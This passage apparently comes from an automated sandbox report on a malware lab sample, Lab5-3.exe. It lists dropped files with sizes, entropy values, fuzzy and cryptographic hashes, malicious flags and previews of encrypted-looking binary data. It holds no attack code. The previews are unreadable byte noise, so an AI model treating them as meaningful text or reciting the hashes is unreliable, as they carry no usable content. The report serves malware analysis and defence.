                                                                                                          SHA-512:981AC034BA3B216660BB3EAC622AD3B12387A9E556372C4CDBCC0FD3E3E7C636FDF3143F1B7B820DE2CACD02A252C81CAC87D56B97120C779B4B7A565051033C
                                                                                                          Malicious:false
                                                                                                          Preview:..g...(.....3..lt0Xn".J.......cM:..L.....D.z....,.$...i..I...4.iR.'.3..(.r...R.X...`h....9...b0..z.`....V.OK"..;[..T..l.H.....H.p....mS......s>..~...qi...... ...3D.(...O..z.%C.X.1.W._2. ..-.u.9U..;@.s..7k*F..x.....&...o.(.igEc.,A.j..s.ye.?......{..Fm.P._w..3.fDA.M...S...^m7*.]....u.....>.w....I$s.B....P...*O..s..}.............".Y.r...5c8j(.CK...r...h...eT.?.E@A..!.:0`...9.d.."G...H..]....J..B9..x...y._...4.E6..5.j....y..,..u.}....@......~Hti.Sv..."x.M.......P.JR....L.Xi"...D....P...#....j.N..A?.m.G...|./p....#3...s...Wu4Yo3.\8..N.....T''^xV...5...j.a..J.}...e...63._x.u.....K......rz...2.......6>.........CVJ./..T.g.Y ...+....c..G....&n.<..tD..'.I...&.1.@....3....Z...[..R.dX.uT.k..TT..nY........~.].....K...M.q.......~.I".%.V...-+......}S.......Ik2...*Q.}.i@.1'....\....6..>1Bl.B.**..Y...oO]B...C;.s...TB....h1.j`[...3...D>-...$!:Pn.5..'V.X4..M....U..H.4.6uU......c.g`!....z..!..Z.Su.gG..m........Sf...g.....`c.1.f.cD...\.b.EO.......dx7...[\E
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3792
                                                                                                          Entropy (8bit):7.94815934604197
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:hkIw8qFcrgJbQNnbGDj8EGx0uKeY2ElUJ:C8qFtKAn8n0Cb
                                                                                                          MD5:334BCFDB5EA46EFCF7430526E50BD9F7
                                                                                                          SHA1:778FC5FA555A45AC75F622F16BA20D64F8429B1E
                                                                                                          SHA-256:93A525DACB6B0DD2F23FEB08E96AE875A8DC7DC450B699759E68A5094DAF4E27
                                                                                                          SHA-512:BF60F2DEC2FAD1D8BE373081A1FE89F1B30672131F2E1A863F7BA4A590E50FA5E534A0F59C52CBBDCAFAE90D74ABE3CCD187427CCA25CC4ABC5CFF51136D833C
                                                                                                          Malicious:false
                                                                                                          Preview:8...#..k.D.S...........y._.{.....-Ogg....+W~.x..X....Q..x.....c.[..+.&.s.#. m.s..Y.c...Q....u).9.......h<..$..\\"!s.^1Spq......^w`.=@Nx?...qF.R\Vv+.^..:.2.J83...8}V.%..).9........y..T....E$..~"Q.;..*..GR...J);......Du+..8.2K.[..8f...{?..qx.#X..X.p...oT..t(b;..J.{H...h.NW..&6.4/..8...M.l.6.....R.Y.-.=.I.."i.DcO.l..p.....>...(....4b..i..R~...........s..w..P...]m........N...J.{].e.Z....M..=.H..!WC+...?..2.v?...W..6+.r....2c...&.:@d,.2....K.D.........:.........7..._..../~..h...i....\+..k.....9....v...8....#.F.......9...7*-.e.!.G'j....J..\?.I.5;.Hzo..V..g.S.....>...C.{"s.....uK%....'...Q<^..2...2.Q8.....[.vr...U...Z....O.[...:)./..{. T4M\....P..]:.O......Ww.s.y..J..j.._..&.m..W|[.\....Oh.A.eku..~E........vOti....j......{o.E..[t.Na.K.........^U..q.=w....{.Q........w.z|..U..P.i.W...D.v6.+V..|..5I%,........q...i...*...gsB.?.m.#j....2.@..Z....y.!.Vjn@N\+.Tp........>.........?....0.4...C.....E..lZ.M%...x....d...:...&....e......".y...CGU.<.....H='.H.m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3808
                                                                                                          Entropy (8bit):7.95055363318328
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:hMnWc64IDQzmK1X+kg+WP6TL17Gx0uKeY2ElUJ:hMn96NEzd+TitI0Cb
                                                                                                          MD5:6A660C29D209D58CBC1D418F6CB6C02D
                                                                                                          SHA1:A34E35B69AE7CC0D89753D5942AA0EDEED6196A1
                                                                                                          SHA-256:C1E5E7038553A84B8628E69E4A0D67ABABFCBC39F4CD6EC0C4C3A9729DD34161
                                                                                                          SHA-512:345C8FECBDFF012553F7674F9B4AE0118E1987B35E47788B5431A394CD3B42C5F5EC04AF10B8B9DB2A92486FD4B5762EB2F054361303A8DF6B7E33854DC119A0
                                                                                                          Malicious:false
                                                                                                          Preview:..,.J..........UE.|?)...uYz..d..P`.e...+B<|...K..`.d/X..m...bLi.'b/.T8...-<h.#........"'....v.y."e..R...=4...V.]_...{..1GZ7|...|.5m......-g?.&....1.....}.8[.U&...1.Uf.S,_..+S.`/=6......`p.8.F.+m..9.+(.z.?m...S.....1..L..iO..z.#i.Y.K..(f..s..).$.......E....n.3. ....|i.g.^.r.......V........ax..,......D...f..Oi...eGNt.. .W...%!...<..+8]...06.l.k....t...M..5q..g.[...S..8I.<..E..5o....a.'....)#z,.%.Yl..H...M....&....>.9..;..G....~......][....._..!_.b.%C=..b..d.."g.8pTM.TH.....!yY...L&.\.f4......%...i.C7....(D.4Z`.*t*.\v...4.<Ob.U.0...5.u..R.<N...:.+kN...1....^...+.../.T}.`=_-#BJ~.QZ.V"..{..$.,.`/..oT$....Te.114i#.O.....g"#..V,Z{....p..`.Ah.c..I.W.."..p.b..m..f>{.KP....{sJ.w...k.qW.l..%.;<..o.m.`T^....SHW.U9......_.....h.....%|I.<...^.7)v....>..W.I...?.&t.#..*..^.....f:..Ovb4....`......z>..v.A.c,.b.v?O...C...&&..4R.I*Fs..CV......e$.J.L.a.-t.......s.Q.$|...W...k......I.i..5f/.....4..L.o>.@....t.w.....RD...8(......._?.b`...d....IK..;-.^}....C...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.926919019402607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TJpQHtMoew+qbvQDJepVCdAhWHIeDDHfUTid3hBaUoSGFcmeykEdEElU92i:TJpQZaq8k2oEQGx0uKeY2ElUJ
                                                                                                          MD5:2EB91BB8AE81BC37833BCC7D40529325
                                                                                                          SHA1:9992D6A0AD9D62F5432C631D758FAEAD9F5925BC
                                                                                                          SHA-256:05E165C8FE0F4C8E33879C7C80A227D454A2CDB8B71C59934A33986DDD4DF55A
                                                                                                          SHA-512:D0914F4FA5ECC3E6BC1660D889A77058F9CFE57B3F9364D8F4349E4CA473BE10FE54DC138D831F7C89C82A8F87B438AEF07D2D361D60B3ED31CB010F965EC426
                                                                                                          Malicious:false
                                                                                                          Preview:p43....,.5_...r..YR1...$W..H....mqV....L......|.........8.@..x..."...P...*.J.+....|!..Z.."]...~<.x7'y.2.4n...@{."g..k].oM..Q'......<...%.C.-.bx.O..j .J}..d:G..P..z..bq..1S.Yay....JR.zF........z.x.a'.....5..i...Hi$.....P.....o....Q..F........b4?..M})..X..Er....U.......h.:.._.._......a`w....?.b'....ij.wk{0....*......,E.....a.....iC.?........O....o....zs<...i.E..+..Z.6...dr.?.[.a._5..!?......<.4.D=...h.<.........L.*...R.l..9.^K..J2..%..]828...,.......{On.k.......e......W.....'.Ho.h2..-i..PN.2.._.p...iY.wo...O..t.,...v...%...9u...r..&oB.X.d.W.+.PB.~.*D..j.....)$.F.O..`.|1.+.s.z...@$u#...].j........aJf<j.....R.nr/s_..Lvm.a.~....%p.4.-..e..K.\=."5.A1M}....Yg&A.ZW.\#.^./.~..k......>..........])....."K.+..,......,.s.'!nx..d4...e.0QN...b=[......?..6....P...?....|:."p....U.E.d/...m...a;.. .d...^.....sH...P..{.....<._)..M..s....3,.9.b.".~.~'..^..@Q.gbS.|.H.!..r}..S:..'.xP.........d.........|....._l{@...}...w.Z#n.Sr.^f<.Uck.{...y.x...3.;..3.G..`Q.g.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4368
                                                                                                          Entropy (8bit):7.965073145898005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:/fg2GjaZEX+wYIWrJNwG+sHKQGx0uKeY2ElUJ:HNFEOwJbsHq0Cb
                                                                                                          MD5:1B45FA6FA28A5485CE05E440F427BF32
                                                                                                          SHA1:B9BC4C58C95E7D78376497BBFBF1D02BF25DF14B
                                                                                                          SHA-256:231F7BC9843ADA69A170FD3AACED7D7B1E59471B9722009195C2B66C420F03DF
                                                                                                          SHA-512:C5642D3908D3FE555A994DCED478963FBF7FF782676A3279FEEFC612FDF0588CD7E8DCE0A1C4DFF453ABC502B02254C2A58A4CFAA53DF30EB2D7D2D352696E9D
                                                                                                          Malicious:false
                                                                                                          Preview:P..y#...V........!.i>..&B.6....$..:8..t.&....H...y..N.>.=.......B...q..K......].......%1......}y.;.....O.J........k.)......%&.lBb.v.Kr...-D......P.d..Ke5..T? .C.X...3...6d.....b..i...1.[..#_N..........X...m...5d-.......l..k..H..*J.$KJ"L.d%Vm/.~R.k0..V...}..v$.[......%.p....Z.p.B...a.4.}%.x...\.J.h....'....C\qA.r~ea.@Xg.../.L ,h.W.:..q....?.xh.jm.f.A.Ff.;r..~.:.$&...3.i...i*.B3].'...;Ri*./.... N..!...i...Z.n.v!&Jv..n.'..D...[.=X...t....I#=....Ey_..G.....!m.&`.nj.B.....\:.1.2'..AC..7y...j.^>.5...X...q...7...-.yF.A.D..k)..D2.*QR...*..).h+.~..v...H....<.*8..c.~._.c.n..n..|B&k..C.....w.{.R...' =......KI'..uEI..n.._....!(.T...!l..%-W.!.lw.,..$.y.;C....O).....r#. .........*mu.!.......f...[...v..e.$.Rk.zX.6`.0.~....&.....ox,.^..BN.].=..\..[.o.39...tp..L..|.y.Hk....;...0.!....tf..M...}rI..r.{m.....fa.(/....lI..@.]N..J.3..W($Z./..v..`.....E.. ..+..4......t....R.r.P..6.....zl.....&..A..=..>W.K.A..dmP.V....dl0.u.....l...uo........s.3.t....0x...W_..%.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3696
                                                                                                          Entropy (8bit):7.943914449455288
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Q1ms2kCFuxVzO34OERt/IcqzAPruGx0uKeY2ElUJ:QUuxVVObUj90Cb
                                                                                                          MD5:4FF67AFF0CFDDF3696BBD9457C8E7C74
                                                                                                          SHA1:7C3E5192F753158EAA87B959FBFAF2B880EB1B4F
                                                                                                          SHA-256:BA7DB543BDEC4A804682A218C9176354E9435A1C10252CF84A779E827592D3A0
                                                                                                          SHA-512:AF4D1A6D392133DBEEE7DE69A468C2E4C4AABA15FCEB67AEB06449539EEC610BD66A7ACD749295CA0BD0579FAF2DA1C2E409F9520D33F82E598657BAF4BB107F
                                                                                                          Malicious:false
                                                                                                          Preview:.......r.r4Q..<.w{.....y..D.W..t.O.6...W.x.*.l...H<1."/L.|6t.........?.].&)...(.g....<f.Q......;...../........g....=.........,f..}..^St(..._.;../.*....qb.O..[.3.6..{.O=..h$2g.hk_r...y.C..(.....Z*..".~.^..I.\.#p.PV..%u.n......6u..-.I2/..a6.....S.....Z.Q0". ...E...L.A.i......M.3jpE5..w..q* .......S...Z=.YJ..o..<.LA..2W0H....DG..QQ..7..I.8.j.K.9...r....I.Vf......}7. M..4-..D.}.S..\s......Os.-1y..,..|.c..-..c.I].!?..eQJ..\...(.[.T...>.....e;. .|....]Y.JYN.S.3.A.<..G{n.!......q.h.T.56#(.Q..i..P6I]j.:0.(....a.l. PM..C...+.......,..B....l..nU...........#...K.H.D.;#o._p......._D...^^E#..X3.3......xN.-#B..V....t4.Re=...t*a.f.TN..r&.].`.^..._..~...t..=..J...%r.....q<....z\.$U.o:...*.......}F.c..#..seO.KHx...W#...>.G..D.'j...%...g.{6.E.O...."?d.Kk>h.r..ck..r..dp!.......e....q.^.+\.u...a.,.CM..z....=.&sjFhk....e\Q.!.%^}Z...Ico..;n?..,....6..h...8..8@./.....H......VF;~...A5.S..o.M.=.Gr49....ke.U.~Y=.....L.".dVE.27...Eh..q....../..p9..~(....<....,.5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3712
                                                                                                          Entropy (8bit):7.954545775446102
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:o9gY/6ILyup6/jHSotD+SKpy8a5wGx0uKeY2ElUJ:oJoyotdRD0Cb
                                                                                                          MD5:1DD0A58AB5C4F9713242761E8F2A8C49
                                                                                                          SHA1:B37D2A9BAC960C5D35E94186A220B42CDEA58CD0
                                                                                                          SHA-256:B6933C0465FCABB5BF5CC376FDEB056447E5EB8C96911925AEA1266EDEAB1BD8
                                                                                                          SHA-512:CCA78FFCB7ED2934A5D8CB6FEAA8918BA4075E886601261D3D8C720555FC6B485A009B9C2F015106A3EBC8A06B03DAEA6A3F83AD3A637D83693B3A8E7F7B67F8
                                                                                                          Malicious:false
                                                                                                          Preview:....s......T.Z..M..{aDon.'{.....P..,.....b-...].o..|n).J......oO...T..|...c.'x....-...E..!..\.=..A.&^.q..{..4d.~bQ'......f..1.1x.j*.)..F.4W...._m.! ..".]..........%'.....)J.........<I.V.%....9}.N....r\l&9..i..V..|U.f.d...Z................)..W.u....o$[?./u..]M.4g.....L1LF..:x...S...W....T..@...<....".Q<.8)u[iP.i..7K.....iQ..5~.O...]xx................?...AG.F.(.sS...p..m.A'.+rSi...X.Q.?..z.u.XE:W...w.X..$......&+....=6...s.n.a1!......"....'c..k..=_.....T.s..@....GQ.)......S...p\?...X.ZrB..'[.....=/.o~N]....1.qg.j".v...A....YO..v\m(.a.,...6v8F...@\.q..D... ...vs..e...T...6d.+......F"....:..8W.X.G}..=...........D.cMF........8.Y.P.$7.J.&NK ...:/.D?..A.....%._...X./.!!.Pt..c........2@..C.@...K./...........0Np0`................wh...60n...U1."../D.<.-..5..}3&.bf.......C...I...I.09.O5..,......!..!)i........OG.H_.g...A,:. {..g........+K.fe/.w5J..@>3.n...e^.....=BoF....4.:..M...\9..!....e.i..*....w.H2fh$.z.s.._.H.E.n:N...S.*...}..w.W..B.... .m.x...@h..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):383832
                                                                                                          Entropy (8bit):7.6489480908933265
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:XN8XWmmiwIDi/kWKiWYnhS4fpbPhEfIClOXD4Ms0TNyQKZ:+GmmiqkJASGxPuvEDY
                                                                                                          MD5:6335DF96E4B8A5A60C099760369C5C2E
                                                                                                          SHA1:CF7EEE078B149E2DB1F890683627EE525F1391BF
                                                                                                          SHA-256:1EBCAA4E3DA94C8A2E85AABA9960BFFB692C2B59238062D6E5259ED62B433282
                                                                                                          SHA-512:4F4260F5AFB81265437FE661B2C1C96BC63F93FB98EB9C505EF0A637D63D46F971DB8559EBA9C6B139B76F248501C7A2245042A8E8F1079FA7A8468F8A9178F6
                                                                                                          Malicious:false
                                                                                                          Preview:....H...B9TI...B...mG..r..o6.@..p....k..N..U.C.._\....d...b.g!.F...w3..(...8R.p...ta.^ .A.....0d=p....H+s........N.V.}...........q..pa3.1..L..zs.|=OU.BA......".oj..S..&....33....%.....#e.*.0.J>.T.....=$....+!&N.Aa.._8\...18..?.^.@r.5.u.^../.8t.w.Hr.o......{Y.c...mE..@-...&...R./........B.;g_...~3.dt.8.,..-.......O.1...E.{Q.....H.e.HK.!.o...".^..}.}\...V..}.........M..G....(.H..D....}.C.8.@ ....\.....jka..7J.j..U'}-....A.@..$[.H.b:p....RxP.../o:......r..6.....p...H...-2..GM}...1AO*r...:..1..{).F.....i..1..;?.60j......j.......*..W.4>t......t..T...EF.>..R......).....Q..>.1P.......mtm....,...J.......e..... .#..m...A.....2.L..evq..v.....[..2.@z.Gqp....?.iG^OD.M[.ms:....-q....9D"C <W).!.R#_.......,...y..a0.-....3We^.;.N`..zf.3D'N.b........c..B.Emp........9.... >8.P...QUt.*...}m.....:....<...\ry......>.....~>....o..k.t...^.W...y".OL..i..5.vH.1..i.Afj...x._]}...J5...4.........&...5...x.....E....j ....n...A.....kk@...6.o2l...e...*"..H.!.3.I.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4288
                                                                                                          Entropy (8bit):7.962239617771732
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:8xGxP7+GiSjtisj6K+eE6v9AdeuxOC1UG9Gx0uKeY2ElUJ:A8+VajlfEUKr3G0Cb
                                                                                                          MD5:AED6FA2D4CA8538A8B805C62DA7F2BF0
                                                                                                          SHA1:2FDEE1526B6119923C36F7377D5307AF5D4A66D3
                                                                                                          SHA-256:090B3FF0DC9332903B11D5707A9FA7A24912C47396EE929B9A0CF6D5BEFC5615
                                                                                                          SHA-512:7F01450D27051F8979F8580A6AAC1C3A42F6D518849DCB4C6AAA931D3AAD4050D197AAB79490A4F4990CE24A7EAE9BAA119BAA56D9668CEBD5508B143488D66B
                                                                                                          Malicious:false
                                                                                                          Preview:h9....^i.4.....?.@#q.H..Q,...LX....pc.o..BAG....@3p...2.cn.."MCd\..E...[.4+(.>..o.,-..?nH.iP".N......;.G.P.......scIY:.C`;..x..m.N.}.G..Nj3. ...4....N....x.^i.Q$...'%..q.#5J}{*.2..i.<8C}U'X..^2.......r.........InLYqTd.'...zH.xR_w.r.....M#OYO*f?T.;..]\...'%..E.n..2.8....Y...j....M|CH...9..h.f.Y\....a.... rpn.u..#g{....T.V......L.-^.........6.....`.~..m|.p.Q.,.c.P...C.^.1..3N.4/.x.n.| V.X:....q;....._..<#...V......X..E....9....g...y.#h6.T5...e.....1./h..........h.R.......-...Q.1..O..,...,N.q...O.F..[.......\.....&........i.. .e.G.h..8..U]...DX.....V.4..I,*;..oW.h'...0H7S.D......{[.........~....A.6).g.qX./.Aa.s..v...fX..;.W..2.C]|...sb..bK.`._....Gzn7...l......e^..L]P.../.....y.8.}..r?.xN... s8.....f..R....<[....u.lL..v...(iF.v...(\2.T..+..-..D`.Y88).."..+l...XX.T.#.'...K......@..oY.....Z..Yh.?hO:..../D'.\)...c+.G..I........O.!...O....b..c...5.[..Nlvpz..H%.c!%E.....G.t.@..B..x....t...b..G..t...|,yXP......,.H.`.WI...[T..`...q.Z...{&...U../(6.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.9263759455946925
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Uj5eCD5WO263D/cdduKfb8yTjQEHfUTid3hBaUoSGFcmeykEdEElU92i:Uj5eCv2OobRfbl6Gx0uKeY2ElUJ
                                                                                                          MD5:EC9936D8AD68B85F095D2984C6DC41BD
                                                                                                          SHA1:067A0CE82B7A9779566D06916AF11D0DF0661BF7
                                                                                                          SHA-256:66C0B3758EE6D1EF7C3B0BA6EE005C7331B64414CDED14666D7D78BC0592F176
                                                                                                          SHA-512:6DA1D825121DF88BED20EC574A6036A93E9BB7945E8502A9AE8F98E5838EBB11D27FC15094B750174F190DE40268FC672BA8F7003605AED581535065C5F201FB
                                                                                                          Malicious:false
                                                                                                          Preview:V..$....w.!.....5....3.R.j...........1l.lI.|.+ft..T.!..J[...pr_X.5....5..*...,..^....;.._.0....bIC5^.i...1vY..].s.|.....b..n.....[H..FZ`..4..|......q .GN.B.WI..%.>[.?+E......Y...$a.\.M..;....ys.s.....u...l..... \..R.k/........6g...h>.C...w.7W...1....X:[.. ...[.......m...8..]2..y#.t0...%..q.W..g..f.n..f}h...t...Gzx.^.l....]..;{.\.....3....YR...j .....=.....;...._..<Q..nh..P..`.qXZn...c..W..:%.f&..F.'...r.,_....w..'../k...B...v|.@\.......U.@Ly...(.]....M&.{..:...#8........'...s.M.h.f+....|4~..@..;.L6.Eo=......#.E.Yr....N.._Hq...LZ..J.?ZMt...x..D!,f,.^..u$.".3. U......^..>P..mh...a..B...9.3+%...#....7.h.I..T.-x...z..x...n.....M.<=.c^.g.+.'s..Z.^ZCZ../...(.)4.....4....H.Ml. LS..g..k.T.L*r.GPB8,.u.3..R.}...%.Up.r..C...U{.*El..|9N.[L."...C..NS......F...&)a.#Y..f.y{+0[|*.b.....Q........:........A.1.^.:#..`h.&....qP..H-.....d.....P 4...-..sG.g.-tv..R.fO_Fq~..DgL.7=Q...7.w...}....{..3)?.....5c..F.`?k.H.X37h..._.".&.....V]O.q.$==.6..W..t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37376
                                                                                                          Entropy (8bit):7.995348664285478
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:cDmP8VZkxzPKrWz4zYKWcbIuH+Tf9N84dbRon0jKdZ:cs8UPPziYxcbHH+TfFhU0CZ
                                                                                                          MD5:00E05BA1FB0E1074CB43CE85F0D1D877
                                                                                                          SHA1:E58E2085C57379B3AFEF04E701D514D7B84C6C88
                                                                                                          SHA-256:E15FE5353E7E6F54FA53B6A5B80B87AA6336F5267249C133B0A80A4BF3BAD75E
                                                                                                          SHA-512:3234D0F2C853A9BFC1E434E347DFA06B5C69EC5A2ED3AA4A06B17F999D21E8A4551BB3CE33C272193225A96A20E86DA1D5BC4C8A2C5337137AA8B0B2E23455A6
                                                                                                          Malicious:true
                                                                                                          Preview:.......L+.......$........Sl.W.P.4p._J..+).=+....o.7........4..f.....N]....E.._.<....(.#.)...<D..Q..6.V>cK%.c#s.%.. ....j....'._.~.V.....%.....<...{ ......^.'?........q.1zFV._l."/..`.J.k.y...,...........".W..5.....4;...)2....c956.._.......'.f..dA..jHI'!.@.;.=...@t..B....w{M.\....}.A..O.[...q.....=$..q......j..6.....<,..}.d..A....j.[..C...#.\Dek.l.y0....<..-=.Et.E"?c.W..`I..E#VG.1.....\W.=...G.!\.4..%Mc.7..z.s..u....q.4..o.H/.......p.%o...d=z.,...y.....o....|.`...?.h.sEz..|`'%....J.i.X..<.4..H.{'..Sj............%.......Y..v.I.%............4..-.7..J..b.96.....P.;.&.l...kl.T.#.4Y_.FP...P~Z:.N...X~...d...S..vS.n~..p....<Q..a.#f...J....R-...{K.'.+..P..$c...u.^...t./..<:...&.../-.I....s..K.=.....s...@.4....l..._0L.e...9....d.j.KT........*..s5... ...am%.}..G........k.CN...........|..Q@b.X.Q..A}......\.I.W6.:.o.$...l.^........E..P...w.R.c.=.........z..._.).s..J.T...79...<\).y.h.%?..-+T'o....R./..E.....A...e...a.8g}...BR.....;A+8.w........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.929694594323624
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hFxdInnRkbiiwoZpyWMVlLEW1EkfUHfUTid3hBaUoSGFcmeykEdEElU92i:rgnRkbiiwSpyh8K1bGx0uKeY2ElUJ
                                                                                                          MD5:9BF331A571212F1582E2886194E299EC
                                                                                                          SHA1:41D8EE646A4ACCD56A82688E822FCB55A2AAD73E
                                                                                                          SHA-256:9A8C20F7D5DC617D2D843B133812FB20D76BE80291710E63DF3FFE6FD1B6A8B0
                                                                                                          SHA-512:C8649874C92CC9E783289F2167ACC8EB259E9FF9DC471D4BDEFCB94D643D65667671099FCF233868C0E20C1DEAAE07C1C5743BFD973576CD136D69250C798962
                                                                                                          Malicious:false
                                                                                                          Preview::..1.K(;.&...E.e]%.....<...9.:GnL...;?...%OI.w..[.7.....=...)H.Y.XC.fc%wu.i1RC).., ....p.D.....$Pe.0L...q...Wz6.=....5...+...K..6......V.f..V..%H5.E%.B.......".fJ..y.."}.......@.\..S... ...2Q.y.........<.D...T.$U.O.j..n..ir.'....a\..y.....;jhJ.;.6...q.P.z..-q.w....;...*2g.J..Q....T.p....f....8.[..Up.:.....![........w....y.I.xH.At....ol..Y....$:.+.b.....OR...mF@.......1.$.g1[....o.........%.OI....%.m..*w.`.LUy.rY.9L.o.nG....oG..)...;..myu+[....O..v.......C...I....!.TFj.._0.V......\".,...v..[.......@l..."h..\#.nA..Aj~..4.aB..e5.G.V J...kR+..i..~..C....E....2.4WC...8d....eS.F..e.$.9.3p...|...)...Z.k..T.....Sg../ARv...)4.[...k...p2.:..#..t)"......l$.6...qb......SO........$<w..IZP.:..?..V{..z...V7.........H....|.E..Wa.>.N../C.T..).!.,g...M...k.._.&.v^.YM*.J"L..D.X...F.?Y......L..1..<...l..&....8s_.N...mL...wzP~._.....F........x.9{....``.R.5:sO!...8.....y{`....z.+@...m..#v(.4....Z.D..:......1k.inM.sxVg.`...l......7.....q.....+,..P.A3....1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.934565380499975
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:eC6HoNnbnUgpFYTvJyGnxAmI98oq5M4HfUTid3hBaUoSGFcmeykEdEElU92i:/6IB+ty2xAV2oqKfGx0uKeY2ElUJ
                                                                                                          MD5:6A0D01812ABABADFE0C3B8D9C80EC53B
                                                                                                          SHA1:DC3D384C2303433A00D20E0B276D5839F96B44B2
                                                                                                          SHA-256:1F50C5FDAF2A4CC139D1505B61C38E7230B2CE46BBCDC5A0FAD0499AE7E1C3DB
                                                                                                          SHA-512:45501E0F563A4C3E2F490E038C2A744C9F46D7DD1BDA68DA189E3E68DAA59C7986ED2C12415AE10D8C0141DCA338E99D2B5B0167932C3552A21743C065ED64B9
                                                                                                          Malicious:false
                                                                                                          Preview:...@.]\..|.?=.@v.O.B $.L.V..J3...G,"......x....V...J.6..B#..@..<Bc..rpX..|.......a.p..'.n..{.8.0A'...V.a...qw.........0...)........{....r+.!k...v...]1....L8....!.f........0...".|..../P...'....0H.i..F...M.'...Z]p1..J.F..U...RY6.E..q....x.....N..".j..6.....]K...&.].l.....Knz}.l.?..tV.V..d...y...{./...(.%......li.3.m...q.D4..@K/..........jph^...M..V.....a.n{r.....ZV..1%.3..g.A.vV./...G245.. &...`.&]..{{6.."#..[.V..@.N}.bQ..W.F2J_YK<.xl.7.A...L.b..v.>X.lM..8..2.9..sr...3..b.]....d}7.J.9...HE-.vz..$...[[...=.5...:.....\.2.i......`)....[.0.x..[....FO'..!.k..z}c.....~.V.K.....I.ZgP...EK.dc|H..@IF./.V].. .........)\..1...$..Gj.{u.Q..2.6...3.c...'......J.]}....z.p.W...u...LC...*...%!._....W3...TvR....w.e.........[0w..Kk.Y)..b.dc"[O......z+.....S8.(...R(3............fA.A...zsIR....w5...KL.o...B.g;.(.k....RQ#j2(.%...+}.C....4..v..9q........w(...^|..g[.t.~....R.F%........0;3..V.Y.....ydB...^Rl..X.YG...._.....x...D..>'.[;.P+.....X....i......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.931148848302678
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ljfoeA4mZgMKYURplL+E/6gPwflZ4LCr8g+az6tj9HfUTid3hBaUoSGFcmeykEdM:lS4cgMKYWXL+E/DP+lZ4LjgRWjWGx0ut
                                                                                                          MD5:2929DD133BA76BBDE7D124AC260E7DC2
                                                                                                          SHA1:D34D7952C48FA81B2EF2048E510F5B73477B8360
                                                                                                          SHA-256:E6AC5250256E3DF7A2349A217839A9267E09C8E395567A78706BAB3DA1968B2D
                                                                                                          SHA-512:0E5B962831CD51250CD46DDA28074B43D7521C6C1942A8D2B0D229977B28664D84AED88B047AEEC2C2B218CE5D9194FF45A1CB29FB68520D16DF777B41151DB4
                                                                                                          Malicious:false
                                                                                                          Preview:R.......b.UA?....`..H+Q..?umEO....C.[.x6.yJ.EFb......:.|l0.}...P..~..s.a.jgA..%J..=4.._.NV.ZC....Is.......HeT.....O.g..4..[..v....X*.I..a.........L.........$a;..P=..g.W..5H.:O...QX..*.:1%.HN.X.....Q..xw.h..k....P.T...K."....j'....@5>.9...;.K.....E.?..Z.{..]...X^i=OI.S;,5^.:.....T..C..L...yy.*.8V{p.O...G.T'$...{'..y..}.".'8.!9:.T~...k..4G..C.....^..5uN..I..K.....v....B.$H........T.p@....x.c..g...a.]..k.z.L..Q...f..Y....eG..@..E..D...3q.H].q....,;.@.....e.).}..W.D!zk.d......-.z}.....i.5..........[k.R..wM..9<.X.}Bk..../.. tP..J...C.&:.......o...D..~....;...}.-.......r.........CE..K.q.>........>...?.TI...pf\I...y15).')Y%..j..+i..g...\.!......B..0.a.Z..O.....+......'6v.j..8{...Z.hW...<P..~.a.WWZ}.5I./...#a.,.9.K..d..E...e,.H6.........0.7"....q..y.k..9.b...\~.%..dO!quN........K..o..Y...V8.X.....a7.1j.i)....n...........>SB........-x.../vP...M.....%Z. 5I)...H...R.Q..:...em....I..]3.4.(..j..-=`.`P......8.]....<M..{.n.7...."....88...=.Z..!6.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.939692975726339
                                                                                                          Encrypted:false
